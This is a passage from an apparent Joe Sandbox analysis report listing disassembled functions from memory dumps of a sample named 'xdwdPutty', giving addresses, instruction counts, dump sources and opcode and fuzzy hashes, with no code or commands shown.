                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 51fc2823ffd3452e8d10b484806f372d801390c90b5bdfb808267d8ac6b4ffe8
                              • Instruction ID: 9c1a5ef56311fdb6e530ca531c87a1294d2cf3110bf475d640a79f8a5d31c654
                              • Opcode Fuzzy Hash: 51fc2823ffd3452e8d10b484806f372d801390c90b5bdfb808267d8ac6b4ffe8
                              • Instruction Fuzzy Hash: F0311931A08A1C8FDF94EB68D885BEDB7F1FB68315F10416AD40ED3252DF34A9868B41
                              Function 00007FFF60F5BED9 Relevance: .1, Instructions: 109COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3d47551a08be09324713a5d19089427baf2e227bd43854a758680956525a522e
                              • Instruction ID: 4a3176911baa5c30f36f9c85a184f0a24d19f045a92824efa24c639adcc8d29b
                              • Opcode Fuzzy Hash: 3d47551a08be09324713a5d19089427baf2e227bd43854a758680956525a522e
                              • Instruction Fuzzy Hash: 13313E5080E3C68FE76B92644C25275BFE0DF23205F2959FBC589CA1E3ED1D681E8762
                              Function 00007FFF60F5AF9C Relevance: .1, Instructions: 104COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c908dba49b9352c9e684a38f3d623f1b5886c50f6a72e556ea197644abc4a925
                              • Instruction ID: f54f7b6551cd80c3492b4285ced379b5a93401c0366941cf7ed19cd09001759e
                              • Opcode Fuzzy Hash: c908dba49b9352c9e684a38f3d623f1b5886c50f6a72e556ea197644abc4a925
                              • Instruction Fuzzy Hash: 9B315C31E1C91A8FEB95EB68D4556FDB3E1FFA8311F60057AD40DE32D2EE2868418750
                              Function 00007FFF60F5E6B9 Relevance: .1, Instructions: 103COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d81025305c76a445578cc1ecde4977639b6a597531bcf0898a889084fd365401
                              • Instruction ID: 9217a4ba7ecf6f2dea81d681b812011d2386df85439360d68f855c9d0bb6a841
                              • Opcode Fuzzy Hash: d81025305c76a445578cc1ecde4977639b6a597531bcf0898a889084fd365401
                              • Instruction Fuzzy Hash: 4B313A12C1C52786FFBEA26894A13B963C1DF32365F6A0476D89CA73C3ED1C6C8542C2
                              Function 00007FFF60F533D0 Relevance: .1, Instructions: 96COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f50000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a77a0d7605c613f1ae8d388ba5b19371e560abe65b6cde44f951bc94d6aab35f
                              • Instruction ID: 5e4e9b3ef734fdae8976502ae73285a8f50f0c12c7ba0178e9d752e8e93094db
                              • Opcode Fuzzy Hash: a77a0d7605c613f1ae8d388ba5b19371e560abe65b6cde44f951bc94d6aab35f
                              • Instruction Fuzzy Hash: 3F316D61A0D3C24FE717977898A22A47FB18F53210F2A01F7D089CB5E3D91D581B8363
                              Function 00007FFF60F5E1E9 Relevance: .1, Instructions: 96COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 777a6825df39b597991f4895261eb8942eebe3a919117e8aeded243c9a23edad
                              • Instruction ID: bf52fc600f6d7a992842ed61108dfc40a047eeb53ba41e666249609323b53051
                              • Opcode Fuzzy Hash: 777a6825df39b597991f4895261eb8942eebe3a919117e8aeded243c9a23edad
                              • Instruction Fuzzy Hash: 39316421D5D627CAEAABEB18D0B167923E1FF65301FB50935D80EE33C6DD18BC019251
                              Function 00007FFF60F5C18F Relevance: .1, Instructions: 89COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 634507dc47e19b58688d297c8d6fe583e9e1f9ccc1ae428b54c1a634e45676fa
                              • Instruction ID: 253b3da170b4c69a85da9dcbc1adbd1bcefc093abae3bfea6259440ed49a4d4a
                              • Opcode Fuzzy Hash: 634507dc47e19b58688d297c8d6fe583e9e1f9ccc1ae428b54c1a634e45676fa
                              • Instruction Fuzzy Hash: 98216D72D0C94B8EFBAAD5A8C81A37837D0DB74311F741A3AC51FD23D2ED28691A41C2
                              Function 00007FFF60F5D947 Relevance: .1, Instructions: 88COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 838b4ceecb55b586ec965462c57dd1d3309ba29a4de9a6a52ad0ea16d2ad1bae
                              • Instruction ID: 762f807d1ac015fb117330ad334cc77206d4b7036c0d3ba089587aea60c450ff
                              • Opcode Fuzzy Hash: 838b4ceecb55b586ec965462c57dd1d3309ba29a4de9a6a52ad0ea16d2ad1bae
                              • Instruction Fuzzy Hash: 57217F31E0D80ECEFB65AB6894556FE77E1EFA8311F640436D50DD3381DE2CA8568B81
                              Function 00007FFF60F5B007 Relevance: .1, Instructions: 85COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 29973d225d794afa3e5d9607e4a727f19c07b4a445d727d751919d9ad3a9647b
                              • Instruction ID: 0aefe4bcd14a288ff13db197a509876a98b172c44988102e919671058dc2a831
                              • Opcode Fuzzy Hash: 29973d225d794afa3e5d9607e4a727f19c07b4a445d727d751919d9ad3a9647b
                              • Instruction Fuzzy Hash: B3211B31A1881ACFEB95EB68D4596BDB3E1FF68301F600479D50DD32E2EE2868418751
                              Function 00007FFF60F57D46 Relevance: .1, Instructions: 83COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f56000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 988ecaddd66262a7587bab44ef6af5af5cd89c71b2a3b42d81b2cbd74bf8627c
                              • Instruction ID: 9002ab626b61203f6f0f812816529098946667846a7c0611d6b05d7fe192bab3
                              • Opcode Fuzzy Hash: 988ecaddd66262a7587bab44ef6af5af5cd89c71b2a3b42d81b2cbd74bf8627c
                              • Instruction Fuzzy Hash: 36312870518B8C8FEBA5DF28C845BD97BE1FF98710F10866AE84DC7255CB38A945CB81
                              Function 00007FFF60F5C171 Relevance: .1, Instructions: 82COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 50248f05e20bc7a0744ac30ccd698c5542182a09322f61311d4e308b19cad768
                              • Instruction ID: 063524ed8de24f5fc687b809a18f867035c5124e2e83b85b56a2f9e7d778ac27
                              • Opcode Fuzzy Hash: 50248f05e20bc7a0744ac30ccd698c5542182a09322f61311d4e308b19cad768
                              • Instruction Fuzzy Hash: 40219A62C0C4478EFBAE9AA8881A2B837D0DF34315F791A3AC51FD23D2ED1C650A41D1
                              Function 00007FFF60F5DB0F Relevance: .1, Instructions: 77COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a0695099b3b41b0727cffcaf2b78d4183927b9dadd794bdda6c7971b30ce0ff1
                              • Instruction ID: bc21f96e3d11058bf49013cebe88870e9d0c478a0e91b93d37a34ec48a65c91e
                              • Opcode Fuzzy Hash: a0695099b3b41b0727cffcaf2b78d4183927b9dadd794bdda6c7971b30ce0ff1
                              • Instruction Fuzzy Hash: 9D212930A1D91E9FEBA9EB6C84556B977E2EFA8301F61017AD40DD3391DF28A8418741
                              Function 00007FFF60F5FCF4 Relevance: .1, Instructions: 75COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e74ae497b4c8e42884fe564d809f685e0a66057717d5f9c1b8b2cbb58530c597
                              • Instruction ID: 2f1afded9d42683aff4c5a1bdfea59f7bcf318760c645c9a2b49eb5781b9b9df
                              • Opcode Fuzzy Hash: e74ae497b4c8e42884fe564d809f685e0a66057717d5f9c1b8b2cbb58530c597
                              • Instruction Fuzzy Hash: 3111D27180D3875FE71BA6248C065B53FA4CF53264F1401FBD19ACA1A3E819641A87A2
                              Function 00007FFF60F5FC8F Relevance: .1, Instructions: 58COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f26baea07de6be616a26ab07bc93c56529cf6e0f0c93fafe8aad6c9364c826f8
                              • Instruction ID: 45b992b109b2ed06771466ead0b717f74370f6b78b2a298fff0aa38cbc255a6f
                              • Opcode Fuzzy Hash: f26baea07de6be616a26ab07bc93c56529cf6e0f0c93fafe8aad6c9364c826f8
                              • Instruction Fuzzy Hash: F0013671B0C60A4A970D6A1C74570BD77C2EBC9320B60557FF64FC36C7DD2AA417418A
                              Function 00007FFF60F5D16D Relevance: .1, Instructions: 57COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f8e1af21b871c5e02caaad795b9d46e6f07b43a015ecd8fd03754be349640579
                              • Instruction ID: 1999ab773c670efb77c66cd2b1ccaea0ac1e598392ef21a590c6fb041de781e1
                              • Opcode Fuzzy Hash: f8e1af21b871c5e02caaad795b9d46e6f07b43a015ecd8fd03754be349640579
                              • Instruction Fuzzy Hash: 27015232E0D51D89FFA9A24CE4436F863D1DB56324F540076D65E936C2DC19385283C1
                              Function 00007FFF60F5A4C1 Relevance: .1, Instructions: 54COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c09ff4005e7651730cd389fab00c28ed9336f03d47ca5baffe5fd52bb6a1a897
                              • Instruction ID: b2cece6c46afa4f15d84a62be63c499fcfbea378ad5de6ef99f56b2503834464
                              • Opcode Fuzzy Hash: c09ff4005e7651730cd389fab00c28ed9336f03d47ca5baffe5fd52bb6a1a897
                              • Instruction Fuzzy Hash: D0012130B1C91ACFEB89E76C94596B877E2EF59305F600079D50DC33A2EE39A8528750
                              Function 00007FFF60F516D3 Relevance: .1, Instructions: 51COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f50000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6bf92f1a6fa0ab9d5de42dc5f83ebab6bb3c9b52473543650cdab3dee9b9de94
                              • Instruction ID: ba7bf9781d12c8ec149836f3695ae36c182afd640774ff992fee526f6fd82b6f
                              • Opcode Fuzzy Hash: 6bf92f1a6fa0ab9d5de42dc5f83ebab6bb3c9b52473543650cdab3dee9b9de94
                              • Instruction Fuzzy Hash: 99018082D1C42B86FB917AACA4812BD76C0EB68354F660970D98DC32C2DD0C6C5502CA
                              Function 00007FFF60F606F1 Relevance: .1, Instructions: 51COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f643f545920ffd005f32005ded221a2ad2764ef88b3cf187221dca46008a1639
                              • Instruction ID: 836806c9d2671d4bc19259277d3728a74ca212e7d533c108232acfcf05c7412d
                              • Opcode Fuzzy Hash: f643f545920ffd005f32005ded221a2ad2764ef88b3cf187221dca46008a1639
                              • Instruction Fuzzy Hash: 5D017122E1C42386FF68766888562FA12C4CFA0355F7906B5E94DC33C6EC5DBC468AC3
                              Function 00007FFF60F537DA Relevance: .0, Instructions: 41COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f50000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c8e7ee15cd242ed046ad86babe0519eacd9736fe1321a68fe4e4578e324c7e02
                              • Instruction ID: 66caff84fe6bc123fb4fa2a5c2b0041babba089d147d85847450113824a586a6
                              • Opcode Fuzzy Hash: c8e7ee15cd242ed046ad86babe0519eacd9736fe1321a68fe4e4578e324c7e02
                              • Instruction Fuzzy Hash: D6F09632E1C83A8AE699763C90452F863C1EF5D351F9908B6E81DE33C1ED1D5C814380
                              Function 00007FFF60F52ABC Relevance: .0, Instructions: 36COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f50000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4f74dbe432afbdcdf6a2d9b0a294151e2976b1c1b4a0edd1119eee5dbb4a46b2
                              • Instruction ID: 8ff0bae43a0bc1691d970987d47ad0f1cf49f61a57abf83677bb1227006e5566
                              • Opcode Fuzzy Hash: 4f74dbe432afbdcdf6a2d9b0a294151e2976b1c1b4a0edd1119eee5dbb4a46b2
                              • Instruction Fuzzy Hash: 50F03030F18E0A5FDB99DB78805927866E3FB95301F900A79D01ED37C2DF79A8518380
                              Function 00007FFF60F52ADF Relevance: .0, Instructions: 36COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f50000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e79e60980e0a60ce0e5621380eb5dfb39d427324f526396710a98a2127ccc6e1
                              • Instruction ID: 8d4968254cd28e66c622c7d3e0e27d32af6f50e6c5c15798822493eda28ff11d
                              • Opcode Fuzzy Hash: e79e60980e0a60ce0e5621380eb5dfb39d427324f526396710a98a2127ccc6e1
                              • Instruction Fuzzy Hash: A9F06221F18A0B4FDB58AB789095169A6E3FF95301B914AB4D00EC77CBDE3CEC418340
                              Function 00007FFF60F580D8 Relevance: .0, Instructions: 34COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f56000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7d927548f172c14d579b24a4596919dc4f8509051651c34f2448c594530dfb5b
                              • Instruction ID: 89191f8fa9244851ff1b6556ec30c45ad996cf71cb06ca804e9af4d475f34579
                              • Opcode Fuzzy Hash: 7d927548f172c14d579b24a4596919dc4f8509051651c34f2448c594530dfb5b
                              • Instruction Fuzzy Hash: 27E0ED10F2D80E87AAAA515D68562B916D1DBB5710FB80036D50EE27C4ED9E6C831296
                              Function 00007FFF60F580E0 Relevance: .0, Instructions: 34COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f56000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eb65ced9a50445ba8fc7b8d4f53ade41dd3d12624671f02cbf7b23c081541d94
                              • Instruction ID: 8056777e42f3d5b3b5c052d8d27c97fc023b2ae2cb693bb238e66ee3434d2da6
                              • Opcode Fuzzy Hash: eb65ced9a50445ba8fc7b8d4f53ade41dd3d12624671f02cbf7b23c081541d94
                              • Instruction Fuzzy Hash: 43E01211F3D81B96B6AA216E68551B936C1DBA9B50F740536E40DE23C9FE8CAC834293
                              Function 00007FFF60F5E5CA Relevance: .0, Instructions: 34COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 384b00842493770d13ebd718215011f7119d03980ebba3868155201839d3cd04
                              • Instruction ID: 247151b9d8f3e7b8c427a919ecdfb9f912dfcdd98431661c9348b120a19191fe
                              • Opcode Fuzzy Hash: 384b00842493770d13ebd718215011f7119d03980ebba3868155201839d3cd04
                              • Instruction Fuzzy Hash: 09F0B411D0C5254AFBA9A518E0A16BC67E19F74360F9904BAE84EF77C1ED1C7D814BC2
                              Function 00007FFF60F53810 Relevance: .0, Instructions: 32COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f50000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 82924cd401cfa2775b362e8485506b9e0efcaef9158ea8a1fb7ce217a7a5ba9f
                              • Instruction ID: 4ecf1becda060c40759e1f52679d4337c75bffa4cb6b45d23a01ff7671733dc9
                              • Opcode Fuzzy Hash: 82924cd401cfa2775b362e8485506b9e0efcaef9158ea8a1fb7ce217a7a5ba9f
                              • Instruction Fuzzy Hash: 9CE06D32E1C93A8AF699363CA1052F852C1EB59361F9908B7E80DD33D2FD1D9D814280
                              Function 00007FFF60F5C0F1 Relevance: .0, Instructions: 32COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b75ac856f5992ea6b4a40662123a8baec133f3094d03bdc6a578798425cf89c0
                              • Instruction ID: 9e2d8ae9b5a633f3bd1c3e4153a7098ac232386298f4cfd60407948e10fcd2fa
                              • Opcode Fuzzy Hash: b75ac856f5992ea6b4a40662123a8baec133f3094d03bdc6a578798425cf89c0
                              • Instruction Fuzzy Hash: 49E0DF2591C9544FE7022254F4C10F963E0EFAA320F2808B2D809D72C3CC0D25638388
                              Function 00007FFF60F5BC51 Relevance: .0, Instructions: 31COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 00c75aae0c16b4651a89cbd4dce9b7893faf05e11d01fcc91a4eb96357f563db
                              • Instruction ID: e709cc4794f72c805aa87e8fd64df7cf8deb33f2700fd6c8e87defb74008dcf5
                              • Opcode Fuzzy Hash: 00c75aae0c16b4651a89cbd4dce9b7893faf05e11d01fcc91a4eb96357f563db
                              • Instruction Fuzzy Hash: A6E02A1080C2A28FE3220320A0A81F837D0FF66220F2909B6C808ABAD3CC2E29424309
                              Function 00007FFF60F5865E Relevance: .0, Instructions: 28COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f56000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9c21359c326135a56517ea19e27a720c0799f07ec7a72f6816ac6fd7c02b7ebc
                              • Instruction ID: 007de1ab732e26c6d12b1dac164158da3cdfbc1b3c93c72ca2f4bfd08428591b
                              • Opcode Fuzzy Hash: 9c21359c326135a56517ea19e27a720c0799f07ec7a72f6816ac6fd7c02b7ebc
                              • Instruction Fuzzy Hash: A6F03920E3D9079AFB66A22895891B612C1EF28345F744474D90BE36C6ED9CBC428282
                              Function 00007FFF60F6050D Relevance: .0, Instructions: 28COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bc3f5a84ca9486cc3e426224e1b9e912028e9223226673f15f75ce725e784c17
                              • Instruction ID: a5b6642cb4d0683b8fbd9067bc2f2ec78c2758eb03f1aee8e8b64db605ed442f
                              • Opcode Fuzzy Hash: bc3f5a84ca9486cc3e426224e1b9e912028e9223226673f15f75ce725e784c17
                              • Instruction Fuzzy Hash: D3D01712B5DC2A4A7499A11C70432BC63C1DBD413176101BBD84DC2286DC0A1D8302C9
                              Function 00007FFF60F5C9BC Relevance: .0, Instructions: 27COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f005ce294cf6e379cd7ee651e236281e4a7aa8482567df34fcbf61f96fcc7bde
                              • Instruction ID: 268305c1d8639713d10fa238d9759f6446bd77896e1ee93e4e78f3752e30e6b1
                              • Opcode Fuzzy Hash: f005ce294cf6e379cd7ee651e236281e4a7aa8482567df34fcbf61f96fcc7bde
                              • Instruction Fuzzy Hash: 0CE04F01B18C8A9FE682B23840692FC57D3EFAA205B68007AD40AD3397ED586C534345
                              Function 00007FFF60F5C28A Relevance: .0, Instructions: 19COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d66117756e6d7ca0f8c1facb36af2a9f31fa8c1be915c29f6928b0f1bc6ad4af
                              • Instruction ID: c5ffa71bd1116dc300c18bbc42fd41a6b4793bd6021228d18b633ab7299f732c
                              • Opcode Fuzzy Hash: d66117756e6d7ca0f8c1facb36af2a9f31fa8c1be915c29f6928b0f1bc6ad4af
                              • Instruction Fuzzy Hash: 40D05E3160D90DCECF46ABA494053ED77A0FF95319FA0187AE10BD62C1CE7A84A8C7C0
                              Function 00007FFF60F5E34D Relevance: .0, Instructions: 18COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 91a55a47545e062138ca3a7a5c0f099de33af4b4f864c971367b05fcb9619315
                              • Instruction ID: 02db36dd9287f4b415a30af3fc1b4163e5c462b16068f08a9caef871022601d6
                              • Opcode Fuzzy Hash: 91a55a47545e062138ca3a7a5c0f099de33af4b4f864c971367b05fcb9619315
                              • Instruction Fuzzy Hash: 96D0C715B2881F865555B75C14512FDA7D2EBD4351F940173D50EC3282DD1A251252C1
                              Function 00007FFF60F5888C Relevance: .0, Instructions: 16COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f56000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 82768b18965c2e656710d5d3c51e66e2b639a2187cac72ca216db488fdc5a3aa
                              • Instruction ID: f14825a93f725bfe3c7bbb5dd9cc838044aee1a4181de9a0ab636f6e0fc3f609
                              • Opcode Fuzzy Hash: 82768b18965c2e656710d5d3c51e66e2b639a2187cac72ca216db488fdc5a3aa
                              • Instruction Fuzzy Hash: 78C08C12B1DC085BA680F11C689EBBE63D2E7FC5A1728413AD40EC33A5EC34D9878342
                              Function 00007FFF60F606D9 Relevance: .0, Instructions: 16COMMON
                              Download Yara Rule
                              Memory Dump Source
